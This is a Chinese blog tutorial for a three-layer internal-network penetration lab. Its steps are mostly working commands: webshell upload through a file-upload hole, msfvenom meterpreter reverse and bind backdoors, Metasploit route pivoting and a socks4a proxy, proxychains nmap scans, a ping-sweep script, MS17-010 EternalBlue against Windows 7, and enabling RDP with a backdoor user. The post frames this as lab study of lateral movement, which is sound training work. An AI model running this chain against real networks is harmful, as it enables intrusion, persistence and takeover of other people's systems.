我猜你也在找内网渗透,这篇难道还不够你嚼烂?
sinye56 2024-11-26 08:29 1 浏览 0 评论
内网
- 前言
- 1.实验简介
- 网络拓扑图
- 2.环境搭建
- 第一层网络
- 第二层网络
- 第三层网络
- 最后
- 第一台Linux
- 第二台Linux
- 3.实验过程
- 第一层靶机
- 蚁剑连接
- 进一步做内网渗透,上传msf后门
- 生成一个名为mshell.elf的msf后门文件
- 蚁剑把后门文件上传到Linux靶机
- 返回msf 开启监听
- Kail接受到MSF会话
- 添加路由
- 使用MSF建立socks代理
- 第二层网络
- 第三层网络
- 添加路由
- Win10远程桌面连接
- 登陆成功
前言
近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。
没有耐心看完的看这里:
网络安全是一门大学问,要想理解透彻还得一步一步来,对此,我整理了一份小白走向渗透的知识总结,还有视频素材,可以对比着学习
需要的关注我:私信回复“资料”获取更多渗透测试、网络安全资料
1.实验简介
网络拓扑图
渗透机:win10+kali
第一层靶机 (外网web服务器): Linux
第二场靶机 (内网web服务器): Linux
第三层靶机 (内网办公机) : win7
用三层网络来模拟内外网环境,主要了解MSF、内网转发等。
2.环境搭建
第一层网络
把渗透机kali和win10网卡1设置选择VMnet1:
靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:
第二层网络
将第二台靶机Linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:
第三层网络
将靶机win7网卡1设置选择VMnet3:
再配置好各台机器对应IP即可。
最后
在第一台Linux和第二台Linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透。
第一台Linux
第二台Linux
3.实验过程
第一层靶机
win10访问http://192.168.85.131/直接上传一句话木马
蚁剑连接
进一步做内网渗透,上传msf后门
打开kali msfconsole 输入msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf
生成一个名为mshell.elf的msf后门文件
蚁剑把后门文件上传到Linux靶机
返回msf 开启监听
use exploit/multi/handler 使用监听模块
set payload linux/x64/meterpreter/reverse_tcp 使用和木马相同的payload
set lhost 192.168.85.128 kaili 的ip
set lport 4444 木马的端口
run 执行
蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件,输入
chmod 777 mshell.elf 加执行权限
./mshell.elf 执行文件
Kail接受到MSF会话
输入ifconfig,发现第二层172.10.10.0/24网段
添加路由
background 将会话转到后台
route add 172.10.10.0/24 1
添加 172.10.10.0/24网段 使用session1
route print 查看路由表
使用MSF建立socks代理
use auxiliary/server/socks4a
set srvhost 192.168.85.128
set srvport 10080
run
配置socks4代理的相关客户端Proxychains
在配置文件/etc/proxychains.conf中添加:
socks4 192.168.85.128 10080
vi /etc/proxychains.conf
添加socks4 192.168.85.128 10080
这样利用proxychains启动的应用都可以带sock4代理,proxychains 为kali自带的,非MSF里的。
建立好代理后渗透机可以通过这台Linux当跳板机进入第二层网络
第二层网络
nmap探测存在web服务的主机
用proxychans启动nmap对第二层网段进行80端口扫描,执行proxychains nmap -sT -Pn -p 80 172.10.10.0/24
扫描发现55和56存在web服务,172.10.10.56即为第二层网络的ip
由于proxychains无法代理icmp的数据包,所以必须添加-sT -Pn参数,即不检测主机是否存活,直接进行端口tcp扫描。
脚本探测存活主机
在本地创建一个名为ping.sh的脚本,脚本内容如下:
#!/bin/bash
ip=”172.10.10.”
echo “ping log:” > ./ping.txt
for i in {1..254}
do
ping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &
done
echo “wait 5s….”
sleep 5
cat ./ping.txt
cat ./ping.txt | wc -l
Kali进入session1会话,然后upload命令上传刚刚创建的脚本到靶机upload /root/ping.sh /var/www/hrml/upload
进入shell执行
python -c ‘import pty;pty.spawn(“/bin/bash”)’
创建一个完全交互式shell,后
Chmod 777 ping.sh
./ping.sh
可以看到172.10.10.0/24网段存活56.57两台
知道存活主机ip后就可以继续进入第二层内网主机
渗透机浏览器配置sock4a代理
蚁剑加代理连接
连接 http://172.10.10.56/upload/php1.php
进一步做内网渗透,继续上传msf后门
制作MSF后门
返回kali msf 输入
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf
生成 mshell1.elf后门文件
因为在内网跨网段时无法反向代理连接到渗透的机器,所以这里使用linux/x64/meterpreter/bind_tcp 这个payload进行正向代理连接。
蚁剑上传后门
蚁剑打开虚拟终端执行后门文件
返回会话
输入ifconfig 发现第三层网络的网段10.10.10.0/24
第三层网络
添加路由
background
route add 10.10.10.0/24 2
route print
进入session 2 上传 脚本 探测存活主机
注意把脚本的ip段修改成该网段再上传
探测到第三层网段的存活ip :10.10.10.101
proxychans 启动nmap对10.10.10.101的1-500端口扫描,执行
proxychains nmap -sT -Pn -p 1-500 10.10.10.101
发现445端口开启
尝试使用ms17-010
use windows/smb/ms17_010_eternalblue
set rhost 10.10.10.101
set payload windows/x64/meterpreter/bind_tcp
set lport 4466
Run ,存在445漏洞
执行成功,返回会话
开启3389远程桌面
run post/windows/manage/enable_rdp 开启远程桌面
run post/windows/manage/enable_rdp USERNAME=zzy PASSWORD=123qwe!@# 添加远程用户
将3389端口转回kali本地5555端口
portfwd add -l 5555 -p 3389 -r 10.10.10.101
Win10远程桌面连接
登陆成功
网络安全是一门大学问,要想理解透彻还得一步一步来,对此,我整理了一份小白走向渗透的知识总结,还有视频素材,可以对比着学习,大家下载就行
关注我、私信回复“资料”获取更多渗透测试、网络安全资料
好了,大概内网渗透流程就是这样子,喜欢本文的转发关注我~
相关推荐
- linux安装FTP
-
1、在nkftp目录下安装ftp,进入到nkftp里面[root@localhostbin]#cd/data/nkftp执行安装命令:[root@localhostnkftp]#rpm-i...
- LINUX下搭建FTP服务器
-
FTP服务器介绍FTP是FileTransferProtocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(App...
- Linux下如何进行FTP设置
-
目录:一、Redhat/CentOS安装vsftp软件二、Ubuntu/Debian安装vsftp软件一、Redhat/CentOS安装vsftp软件1.更新yum源yumupdate-y2.安...
- 推荐使用集串口 SSH远程登录和FTP传输三合一工具MobaXterm
-
来源:百问网作者:韦东山本文字数:1216,阅读时长:4分钟在以前的资料里,串口和SSH远程登使用SecureCRT,window与ubuntu数据传输使用filezilla,窗口切换来切换去,麻烦也...
- 如何搭建FTP服务器(Linux系统)
-
上次说了Windows操作系统下搭建的FTP服务器,那有朋友问我,说买的XX轻量应用服务器都是属于Linux的操作系统,我该如何为搭建FTP服务器呢?...
- Linux 命令 ncftp(文件传输)——想玩转linux就请一直看下去
-
我是IT悟道,点击右上方“关注”,每天分享IT、科技、数码方面的干货。Linuxncftp命令...
- 如何用 ftp 实现一键上传
-
简介ftp是Internet标准文件传输协议的用户界面,它允许用户与远程网络站点之间传输文件...
- Linux安装ftp
-
1安装vsftpd组件安装完后,有/etc/vsftpd/vsftpd.conf文件,是vsftp的配置文件。[root@bogon~]#yum-yinstallvsftpd2添加一个...
- 一天一点点:linux - ftp命令
-
linuxftp命令设置文件系统相关功能。FTP是ARPANet的标准文件传输协议,该网络就是现今Internet的前身。语法ftp[-dignv][主机名称或IP地址]参数:-d详细显示指令执...
- Centos 7 搭建FTP
-
目录安装软件以及启动服务添加防火墙规则关闭selinuxftp配置常用常用参数详解特殊参数配置文件没有的参数也可以添加到配置中1.安装软件以及启动服务yuminstall-yvsftpdsys...
- 【Linux】Linux中ftp命令,没有你想的那么简单
-
本文介绍了Linux中FTP命令的基本用法,包括连接与登录远程服务器,以及解析了FTP协议中五个最常用的操作命令的使用和解析过程。同时,提供了一个包含常用FTP操作命令的表格,供读者参考。通过熟练掌握...
- linux 命令行操作ftp
-
以下是linuxftp命令参数的详解。FTP>!从ftp子系统退出到外壳?FTP>?显示ftp命令说明??和help相同?格式:?[command]说明:[com...
- 多学习才能多赚钱之:linux如何使用ftp
-
linux如何使用ftp步骤1:建立FTP连接想要连接FTP服务器,在命令上中先输入ftp然后空格跟上FTP服务器的域名'domain.com'或者IP地址例如:ftpdom...
- linux常用网络操作方法:ftp命令使用方法
-
常用网络操作方法Linux提供了一组强有力的网络命令来为用户服务,这些工具能够帮助用户登录到远程计算机上、传输文件和执行远程命令等。本节介绍下列几个常用的有关网络操作的命令:ftp传输文件tel...
- Linux 5.15有望合并Memory Folios方案 内核构建速度可提升7%
-
甲骨文公司的长期内核开发人员MatthewWilcox已经研究了“内存对开区”概念相当长的一段时间,这可以改善Linux的内存管理,使其具有更大的效率。例如,使用内存对开的基准测试表明,内核的构建速...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- oracle忘记用户名密码 (59)
- oracle11gr2安装教程 (55)
- mybatis调用oracle存储过程 (67)
- oracle spool的用法 (57)
- oracle asm 磁盘管理 (67)
- 前端 设计模式 (64)
- 前端面试vue (56)
- linux格式化 (55)
- linux图形界面 (62)
- linux文件压缩 (75)
- Linux设置权限 (53)
- linux服务器配置 (62)
- mysql安装linux (71)
- linux启动命令 (59)
- 查看linux磁盘 (72)
- linux用户组 (74)
- linux多线程 (70)
- linux设备驱动 (53)
- linux自启动 (59)
- linux网络命令 (55)
- linux传文件 (60)
- linux打包文件 (58)
- linux查看数据库 (61)
- linux获取ip (64)
- linux进程通信 (63)